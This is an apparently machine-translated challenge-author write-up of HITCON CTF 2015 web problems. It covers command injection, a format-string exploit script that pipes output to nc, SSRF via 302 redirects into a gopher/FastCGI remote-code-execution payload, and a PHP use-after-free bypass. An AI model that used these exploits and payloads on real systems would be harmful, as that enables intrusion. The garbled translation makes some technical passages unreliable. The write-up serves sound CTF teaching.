Hitcon ctf 2015 Quals Web questions

Hitcon ctf 2015 Quals Web questions

P.s. The related code is put on Github. If you are interested in research, you can first look at the code and try to understand it!

Written after hitcon ctf 2015 Quals. As a member of the problem team, I have to say that the difficulty of this competition is really not a little high. XD, but as a DEFCON seed competition, I think it is a real name! :) This time, I took charge of all the Web questions. In private, they are all about self-confidence. In response to the contestant's reaction, we will make some of the things we have recently studied into a topic XD, it makes them feel difficult to solve the problem, but after the solution, they will feel like "It turns out to be so" and "you can play it like this" is my main purpose XD

0x01 100 BabyFirst (33 teams)

<?php    highlight_file(__FILE__);    $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];    if ( !file_exists($dir) )        mkdir($dir);    chdir($dir);    $args = $_GET['args'];    for ( $i=0; $i<count($args); $i++ ){        if ( !preg_match('/^\w+$/', $args[$i]) )            exit();    }    exec("/bin/orange " . implode(" ", $args));?>

Https://gist.github.com/orangetw/cb3487e47d7aaaea4692

As the simplest question of the Web, the code-only analysis only has fifteen travel code, only two hours after the start of the competition can someone solve the common regular expression that does not match multiline by simply using \ n, however, the difficulty lies in the ability to Command Injection, but the Command is limited in the a-zA-Z0-9 _ this is also the most interesting place, each team's ideas are different, so there are a lot of solutions! Your official solution is mkdir orangmcm orangewget HEXED_IPtar cvf payload orangephp payload. You can execute any code and see other teams in the log. The solution is busybox ftpget... or twistd telnet... or wget HEX_IP // give a 302 Redirect to the FTP protocol, which is also the most unusual XD in this solution. // I have also checked the wget source code to say that the generated index.html should be uncontrollable, as a result, you can control the FTP Protocol. In general, you can also see the extreme XD of playing Command Line. I think it is the most successful question for anyone who has learned the full-use method, simple, fun, and interesting! 0x02 200 nanana (18 teams)

Https://gist.github.com/orangetw/4942d949134227eedd4c xxd-r-p nanana. xxd> nanana name Web is actually a Pwn question that only provides binary and does not provide libcgid. so you have to solve this problem without library! Simple Format String but no output (sprintf ), you can replace the GOT of do_job with the system's PLT address. However, you must first use stack guard to overwrite the ARGV1 of stack smashing detected to achieve arbitrary address leakage. Only when the password is disclosed to the hacker it is easy to use. However, because 64-bits and no NULL bytes can be provided for the provided items, when creating ARGV1, you must first use username to set ARGV1 to NULL, and then use username to set ARGV1 to NULL. ARGV1 penultimate cover NULL and then job cover memory location (0x601090) after three bytes, the remaining five bytes are NULL to read the Exploit details at any address. For more information, see

import requestsfrom urllib import urlencodefrom struct import pack, unpack URL = 'http://54.92.88.102/cgi-bin/nanana' def leak(address):    address = pack('I', address)    address = address.strip('\x00')     payload = {        'username': 'A'*349,         'password': 'B'*380,         'job': 'C'*392 + address    }    r = requests.get(URL+'?'+urlencode(payload))    l = r.headers['*** stack smashing detected ***']    l = l.strip(' terminated')    l = l.ljust(8, '\x00')    try:        return unpack('Q', l)    except:        return l def e(cmd, pwd):    payload = {        'username': cmd,         'password': pwd,         'job': '\x48\x10\x60',         'action': '%198x%15$hhn'    }    print urlencode(payload)    r = requests.get(URL+'?'+urlencode(payload))   if __name__ == '__main__':     pwd = leak(0x601090)    print 'pwd @ %s' % pwd     e('id | nc 127.0.0.1 12345',pwd=pwd)

https://gist.github.com/orangetw/583a73f58d49b1a3fc140x03 300 Giraffe's Coffee (Team concert) https://gist.github.com/orangetw/4a412fb0d49cad0c4ea3 The core concept of code analysis is PRNG prediction in PHP. Most of the random trees are generated based on PRNG because it is difficult for computers to achieve true "random. In PHP, the implementation of PRNG is the transformed Mersenne Twister algorithm. Without providing seed, php_mt_rand will use the current pid and time for some operations as seeds, this seed is 32-bits long, so some of them can be cracked by using ready-made tools, but they will find that they fail, cannot predict PRNG correctly because PHP uses the prefork method to execute in Apache, so each line is selected from the process that has been fork for you to use. Therefore, it cannot be determined whether the STATE in the current process PRNG is the first time, and the process on each connection is not necessarily the same, so the STATE is more unpredictable (the ready-made tool will only calculate the first comparison after seed) in this case, we can use the Keep-Alive method to ensure that the same process is connected, and then the original seed cracking is added with the STATE operation (a total of 624 states) you can solve it! 0x04 400 lalala (Team 2 solution) a service that uploads images to users or provides websites to help you capture and upload images. The core concept is to use 302 redirect to bypass the restriction to implement SSRF, in addition, the gopher in SSRF uses the local FastCGI prtocol to implement remote code execution. When capturing images, 302 can be used for SSRF (in fact, many people ignore 302 when studying SSRF ). highlights) in SSRF, you can read the file (Location: file://localhost/etc/passwd ) Will find that the server architecture is using Nginx + PHP-FPM, where the PHP-FPM fastcgi protocol runs in the form of bind port on the local machine in the real world, as long as you find that the other PHP FastCGI can be connected externally, you can use shell. Therefore, if you use gopher to construct FastCGI Protocol to access the 9001 port of the local machine, you can execute the Location: gopher: // 127.0.0.1: 9001/x % 01% 01i % 13% 00% 08% 00% 00% 00% 01% 00% 00% 00% 00% 00% 00% 04i % 01% 8B % 13% 0E % 03REQUEST_METHODGET % 0F % 0FSCRIPT_FILENAME/_ www/ index. php % 0F % 16PHP_ADMIN_VALUEallow_url_include % 20% 3D % 20On % 09% 26PHP_VALUEauto_prepend_file % 20% 3D % 20 http % 3A // configure allow using PHP_ADMIN_VALUE _ Url_include: Set it to on and add auto_prepend_file to your website.) Another interesting question is that if SSRF is used with gopher, it should be found that gopher in Java can only accept gopher in 0x00-0x7flibcurl and can only accept 0x01-0xff. Then, this question uses curl_exec in PHP, and libcurl cannot use NULL Byte, however, if FastCGI Protocol is constructed, NULL bytes are not allowed. Later, I studied the original libcurl code and found that the NULL Byte cannot be used because of some write problems. Therefore, a commit was sent and accepted... XD. https://github.com/bagder/curl/commit/5bf36ea30d38b9e00029180ddbab73cab94a2195 So now the new version of libcurl/curl should be gopher can Use NULL Byte XD 0x05 500 Use-After-FLEE (1 Team solution) (only PPP solution) as the most difficult Web problem, XD is often encountered during penetration testing) other Websites on the same host will be restricted by open_basedir and disable_functions, but PHP has seen many Memory holes in history, this is one of the items used in this question (during the question, Ubuntu apt-get preset installed PHP still has holes, but it seems that XD has been fixed at the time of writing this article) for PoC vulnerabilities, refer to 80 vul's PHP Codz Hacking, but only PoC :( https://github.com/80vul/phpcodz/blob/master/research/pch-034.md Using Use-After-Free to bypass the above restrictions seems very simple, but there are a lot of protection in today's job system, you have to face depfull aslrpie (Apache is fully enabled by default) full relro (Apache pre-configured) because the environment is on Apache + mod_php, PHP is loaded into Apache as a Library, so the difficulty of reuse will increase (CLI alone is actually very easy to Exploit). For example, if you want to handle the Parsing ELF action by yourself, XD, but PPP is worthy of being solved by the strongest team one and a half hours before the end of the game, it is also the only team to work out! However, it is a little pity that the game platform is on the Ubuntu 14.04 64-bits of EC2, so for libc offset, they directly use the libc offset of other Pwn questions instead of calculating STRTAB, SYMTAB and JMPREL are used to locate the offset: among them, the writeup of Ricky in PPP https://github.com/pwning/public-writeup/blob/master/hitcon2015/web500-use-after-flee/exploit.php Here, Ricky uses the ZVAL structure to replace handler with the system location and the ZVAL type is declared as OBJECT and the refcount is 0 struct _ zval_struct {zvalue_value value; zend_uint refcount _ gc; zend_uchar type; zend_uchar is_ref _ gc;}; in this way, PHP automatically performs destruct when it finds that the reference is 0 during internal processing and throws ZVAL as a parameter to handler, in this case, the length limit of 8 bytes can be used (So Ricky uses sh/*/a; to execute the command ). However, if the length limit is changed to 4 bytes under 32-bits, it is almost impossible to use XD's more elegant method to change GOT Hijacking to fopen and call fopen to execute the write ($ open_got, $ system_address); fopen ("| $ cmd", "r ");

 

If you are interested, you can try writing and reading, and try to write Exploit perfectly! : P